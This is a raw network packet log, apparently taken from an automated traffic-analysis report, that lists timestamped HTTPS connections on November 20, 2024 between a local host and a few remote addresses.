                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.453964949 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.454485893 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.454489946 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.563658953 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.564655066 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.564709902 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.565201998 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.565215111 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.935842991 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.939193964 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.941953897 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.941987038 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.941998959 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.942019939 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.942027092 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.945533037 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.945558071 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.945656061 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.945859909 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:07.945873022 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.019751072 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.022125959 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.022236109 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.022330046 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.022417068 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.022440910 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.022473097 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.022479057 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.024940014 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.025028944 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.025119066 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.025259018 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.025288105 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.136482000 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.137073040 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.137093067 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.137669086 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.137675047 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.193641901 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.201423883 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.201442957 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.202137947 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.202145100 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.704704046 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.704773903 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.704778910 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.704839945 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.704859018 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.704905033 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.704946041 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.704947948 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.704993010 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.708173037 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.708193064 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.708206892 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.708214045 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.709258080 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.709269047 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.709305048 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.709310055 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.712899923 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.712944984 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.713010073 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.713975906 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.714046955 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.714113951 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.714356899 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.714375973 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.714510918 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:08.714545965 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.381072998 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.381599903 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.381618977 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.382169962 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.382174969 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.845257044 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.846554995 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.846565008 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.846791983 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.846795082 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.847579956 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.848129988 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.848154068 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.848737955 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.848742962 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.855729103 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.859160900 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.859217882 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.859230042 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.859244108 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.859297991 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.859334946 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.859343052 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.859357119 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.859369993 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.862656116 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.862710953 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.862778902 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.862905979 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:09.862930059 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.312144041 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.315615892 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.315695047 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.315757036 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.315779924 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.315793991 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.315799952 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.317497015 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.319219112 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.319303036 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.319400072 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.319555044 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.319588900 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.321187973 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.321252108 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.321300983 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.321300983 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.321320057 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.321329117 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.323977947 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.324023962 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.324101925 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.324239969 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.324258089 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.554538012 CET44350052142.250.181.68192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.554616928 CET44350052142.250.181.68192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.554806948 CET50052443192.168.2.7142.250.181.68
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.596946955 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.599945068 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.599982977 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.600356102 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.600367069 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.665209055 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.665914059 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.665997982 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.666507006 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:10.666524887 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.036020994 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.039150953 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.039339066 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.039532900 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.039557934 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.039592028 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.039598942 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.043665886 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.043715954 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.043937922 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.044146061 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.044162035 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.067567110 CET50052443192.168.2.7142.250.181.68
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.067584991 CET44350052142.250.181.68192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.116472006 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.119471073 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.119590998 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.119671106 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.119755030 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.119755030 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.119800091 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.119824886 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.123142004 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.123179913 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.123243093 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.123533964 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.123555899 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.587239981 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.587964058 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.588001013 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.588622093 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:11.588629961 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.027467966 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.030936003 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.031116009 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.031186104 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.031207085 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.031217098 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.031224012 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.034609079 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.034691095 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.034784079 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.034982920 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.035017014 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.041769028 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.042177916 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.042236090 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.042781115 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.042800903 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.244152069 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.244631052 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.244647980 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.245249987 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.245261908 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.478931904 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.482053995 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.482109070 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.482146025 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.482167959 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.482181072 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.482187986 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.485222101 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.485255003 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.485321999 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.485502005 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.485517979 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.731806040 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.734474897 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.734555960 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.734603882 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.734627008 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.734639883 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.734646082 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.737952948 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.738034010 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.738147974 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.738315105 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.738348007 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.816404104 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.816858053 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.816924095 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.817377090 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.817394972 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.900926113 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.903398037 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.903422117 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.903892040 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:12.903898001 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.262700081 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.265841007 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.265978098 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.301198006 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.301198959 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.301248074 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.301264048 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.324829102 CET50083443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.324846983 CET4435008313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.324918032 CET50083443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.333632946 CET50083443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.333652973 CET4435008313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.358453035 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.358623981 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.358690977 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.365632057 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.365653038 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.365667105 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.365673065 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.397471905 CET50084443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.397526979 CET4435008413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.397597075 CET50084443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.397735119 CET50084443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.397752047 CET4435008413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.828457117 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.829179049 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.829256058 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.829915047 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:13.829931974 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.273914099 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.277141094 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.277204037 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.277278900 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.277318954 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.277348042 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.277364016 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.280781031 CET50085443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.280818939 CET4435008513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.280880928 CET50085443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.281076908 CET50085443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.281095982 CET4435008513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.373447895 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.374007940 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.374032021 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.374620914 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.374627113 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.547914028 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.548897982 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.548957109 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.549570084 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.549583912 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.831403971 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.834558964 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.834640980 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:14.835457087 CET50081443192.168.2.713.107.246.63
